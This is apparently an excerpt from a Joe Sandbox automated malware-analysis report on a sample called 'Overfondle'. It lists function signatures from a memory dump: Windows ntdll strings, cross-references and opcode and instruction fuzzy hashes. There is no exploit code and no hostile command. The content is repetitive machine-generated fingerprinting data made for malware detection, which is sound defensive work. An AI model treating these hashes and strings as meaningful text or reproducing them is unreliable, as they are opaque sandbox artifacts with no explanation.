• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
Uniqueness
Uniqueness Score: -1.00%

Strings
• @, xrefs: 2051C1F1
• PreferredUILanguages, xrefs: 2051C212
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2051C1C5
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
Uniqueness
Uniqueness Score: -1.00%

Strings
• PSC , xrefs: 2046A348
• RtlpResUltimateFallbackInfo Enter, xrefs: 2046A2FB
• RtlpResUltimateFallbackInfo Exit, xrefs: 2046A309
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: PSC $RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-3250076594
Uniqueness
Uniqueness Score: -1.00%

Strings
• minkernel\ntdll\ldrinit.c, xrefs: 204E2104
• LdrpInitializationFailure, xrefs: 204E20FA
• Process initialization failed with status 0x%08lx, xrefs: 204E20F3
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: \U
• API String ID: 0-2992332667
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 204E895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: ad1b9c9b6531076f136b6372d334e403db461b74c55a0be6945944765756eeba
                                                                        • Instruction ID: e8b49dad3453a7c187126b8b771a2fa46c06f3a51de1a33e35435e71f86aed28
                                                                        • Opcode Fuzzy Hash: ad1b9c9b6531076f136b6372d334e403db461b74c55a0be6945944765756eeba
                                                                        • Instruction Fuzzy Hash: AE0147B6A006009BDA124BD78CC0B2A7FA0FF91699F00402DF68D03A53CB2CAC45D793
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 2046AA25
                                                                        • LdrResSearchResource Enter, xrefs: 2046AA13
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: e770d89e6f67df9c104342a671796696912afd0a8dd0c75d4e5aa3d6bfb4a762
                                                                        • Instruction ID: 02de62bcd37a51e847ac48e3a3e05d508382fa5689884ccdc80af8d42dda894a
                                                                        • Opcode Fuzzy Hash: e770d89e6f67df9c104342a671796696912afd0a8dd0c75d4e5aa3d6bfb4a762
                                                                        • Instruction Fuzzy Hash: 15E16C75A00618AFEB11CBD5CA80B9EB7B9BF44B54F10802BEA00E7251EB7C9D91DF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: bd312acbe097605e82551c3a15f4d6343df6d49d6c56c54e7c312adc3e58977e
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 3DC1EF31204B429FEB14CFA4D841B6BBBE5EFD4718F148A2DF6958A2D0D778E905CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: 02ff2754f1af3a78ac3f07f9b009a75416adf02bdaf59363fca54ddc08856558
                                                                        • Instruction ID: 597ffb27508f33f4bf4ff8443b639b8ded905a3340ac718c6594b36710e9a2c6
                                                                        • Opcode Fuzzy Hash: 02ff2754f1af3a78ac3f07f9b009a75416adf02bdaf59363fca54ddc08856558
                                                                        • Instruction Fuzzy Hash: F6615C72E002189FDB14EFE9C890BADBBB5FB44744F2080AEE648EB351D7399901DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: 78363eff03b21717636fa728c9d2fed4c35cdbc3080d151f2ece5183024bdc8f
                                                                        • Instruction ID: 20646c6c7de16a0cf8d64f7396e7cdd3e37121f9af43d7af3e94a64452a87ffd
                                                                        • Opcode Fuzzy Hash: 78363eff03b21717636fa728c9d2fed4c35cdbc3080d151f2ece5183024bdc8f
                                                                        • Instruction Fuzzy Hash: 585139B1D0021DAFDB01CFE5CD91BEEBBB9EB58B58F104529E911B7290D634AE05CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 461a76e9216e001a68376181757e8919de42609c5bf2394505f90b56c82c2786
                                                                        • Instruction ID: 5dc36e3d504f84c07d7840daf4f0f2fae249d704dd73dda080d18204f31e9238
                                                                        • Opcode Fuzzy Hash: 461a76e9216e001a68376181757e8919de42609c5bf2394505f90b56c82c2786
                                                                        • Instruction Fuzzy Hash: B001D1B2104648AFD311CF98CD85F167BE8FB5471AF05C93AB698C7190E338D814DB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: 5fe690f63c7781ab6bfe310f0287a3696a51dcfabddb752f25682e89d041508d
                                                                        • Instruction ID: 739de5ee4eadb5465ed3adcd86b53ccb4b172a3c3058c8f7654b6a79e834381e
                                                                        • Opcode Fuzzy Hash: 5fe690f63c7781ab6bfe310f0287a3696a51dcfabddb752f25682e89d041508d
                                                                        • Instruction Fuzzy Hash: 35825D75E002589BDB24CFE9C880BADB7B1BF48754F10C16AE919AB351E7389E81CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98eb80105b82436eaacb367053badc7cdd38874fc0f6cfd24ef7dc0a0af05bb6
                                                                        • Instruction ID: b47986f98b432208f3d3941bcbba45382f7ae4094b105023bf142e9fbf18a459
                                                                        • Opcode Fuzzy Hash: 98eb80105b82436eaacb367053badc7cdd38874fc0f6cfd24ef7dc0a0af05bb6
                                                                        • Instruction Fuzzy Hash: 71329C75A00614DFDB14CFA8C480B9AB7F1FF59304F20856AE955AB3A1EB38ED41CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb77f42686746309d9f775be05cfef334e1928837b57fa343eac884e7a48bfc5
                                                                        • Instruction ID: 978bd1c2619c08c5c9a4c8eb2c540c3e2564b742ff358e2eef756b36ad82483f
                                                                        • Opcode Fuzzy Hash: bb77f42686746309d9f775be05cfef334e1928837b57fa343eac884e7a48bfc5
                                                                        • Instruction Fuzzy Hash: 3BE18D71508341CFC704CFA8C590A5ABBE0FF99318F15CA6DE99987351EB39E909CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @3U
                                                                        • API String ID: 0-1625249073
                                                                        • Opcode ID: 16fb3a782b2971c7dbccf56ac244dba28783c416e50cb49b33bf191a50d55df3
                                                                        • Instruction ID: f17a62300ff7b69bf8c77675a96a251ca8a6bbae2304daa4b6a4fc0f205907c6
                                                                        • Opcode Fuzzy Hash: 16fb3a782b2971c7dbccf56ac244dba28783c416e50cb49b33bf191a50d55df3
                                                                        • Instruction Fuzzy Hash: C232EFB8A047558BDB14CFA9C844BAEBBF2BF84704F20C11DE9859B381D73DA942DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c65b34f98d3f2f073dc39167e5e882f2c9eb76cff030d8a297da650acb012a9
                                                                        • Instruction ID: e6f69874a3029a041326e3ba9ac3b2a9be1f639bbe5a37fcaab8f91ef6ecfee2
                                                                        • Opcode Fuzzy Hash: 2c65b34f98d3f2f073dc39167e5e882f2c9eb76cff030d8a297da650acb012a9
                                                                        • Instruction Fuzzy Hash: F1A1F235E00658AFDB11CBD9CC44F9EBBB4BB00B54F11C665EA10AB291E77C9E41CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 6e3ba1b9a69540e21062519a178efd3e8987f12d9177aa94fcf132a40e6a11fd
                                                                        • Instruction ID: 51a35507e0662bbde71634511e45b6d20c58500de761c46514386703adb3ccd4
                                                                        • Opcode Fuzzy Hash: 6e3ba1b9a69540e21062519a178efd3e8987f12d9177aa94fcf132a40e6a11fd
                                                                        • Instruction Fuzzy Hash: 11419A71901B00EFC711DFA8CA41B59BBF1FF54719F20C2AED8069B6A1EB389A41CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 4a2324eeface6921eea0577a383f7bcc70abeb1dd90430d51063edf7c15c01f0
                                                                        • Instruction ID: 0fcb1c0d02447fb1cbe705f7aba231f23b304ca653cbb2c9efa28e1fd5114bc6
                                                                        • Opcode Fuzzy Hash: 4a2324eeface6921eea0577a383f7bcc70abeb1dd90430d51063edf7c15c01f0
                                                                        • Instruction Fuzzy Hash: 5C41A1719083419FD320DF69C845B9BBBE8FF98654F008A2EF998D7251D738D944CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: e5a80bad02d561d29b75c1ffbcb74d65ffa2c3f83f11e1c0f4b2b3a977f7110e
                                                                        • Instruction ID: 42e39a5ca491ce46f6d8cad49d2d52cf68f4ff37818d87048ffc6c3e5667978e
                                                                        • Opcode Fuzzy Hash: e5a80bad02d561d29b75c1ffbcb74d65ffa2c3f83f11e1c0f4b2b3a977f7110e
                                                                        • Instruction Fuzzy Hash: C2419FB12443018BDB15CFA8C894B2BBBE9EFD0754F50C42DEA458B2A5EB38DD49CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: a3e337efd9cef14e4cf32b1aa92980b5583fc2860e7558c362ed9d55fde8e526
                                                                        • Instruction ID: 4e19bc5edb8e93aa0304884d3f82b57f7d22dcf13e96c1c3369a62702afc2eda
                                                                        • Opcode Fuzzy Hash: a3e337efd9cef14e4cf32b1aa92980b5583fc2860e7558c362ed9d55fde8e526
                                                                        • Instruction Fuzzy Hash: E0315CB1615341DFC700CF98C58094ABFF2FF89618F5489AEF4889B251D3319E05CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: d047b903c9b60408627d7de65965271444352236a4bfea0026736c6b2fafa5e7
                                                                        • Instruction ID: d8173ba81c7dd1d9ff0c17eaae78baac4ee50532f893b0623e823f5db0a38aa0
                                                                        • Opcode Fuzzy Hash: d047b903c9b60408627d7de65965271444352236a4bfea0026736c6b2fafa5e7
                                                                        • Instruction Fuzzy Hash: 8311A036200A119BDB118BA9D850F56FBA6EFC4610F158829EA8287690DB34FC02CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 4b89878ea22e830910297972883a2be216624497d65e0fbed1626d46395f9dff
                                                                        • Instruction ID: 9d4dd5242bb227565dbc27361ebda79749e6418a6a540a1e0652b13415ca4517
                                                                        • Opcode Fuzzy Hash: 4b89878ea22e830910297972883a2be216624497d65e0fbed1626d46395f9dff
                                                                        • Instruction Fuzzy Hash: FE019A36110119ABCF028F94CC40ECE3F66FB4C755F058106FE1866220C23AE971EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2+S
                                                                        • API String ID: 0-3850791016
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: 8a545b947b9e0b31be981e1c502e5a741bc3a1572de05b0b23ff479c3f7199e0
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: AFB13771E00A5ADFDB18CFA9C880AADBBB5FF88304F148569E914AB355D734AD41CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 81d4592bf5330fd1c629cff1a33dd91c7fb926bd50b126f83c566e83488e29cc
                                                                        • Instruction ID: 9c3c80404197d593bd83c3d802994fccc3990a4970bc395a82a13e186cd17b1c
                                                                        • Opcode Fuzzy Hash: 81d4592bf5330fd1c629cff1a33dd91c7fb926bd50b126f83c566e83488e29cc
                                                                        • Instruction Fuzzy Hash: 19918271A41219BFDB21CBE5CC85FAE77B8EF14B94F108059F604AB291D778AD00CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
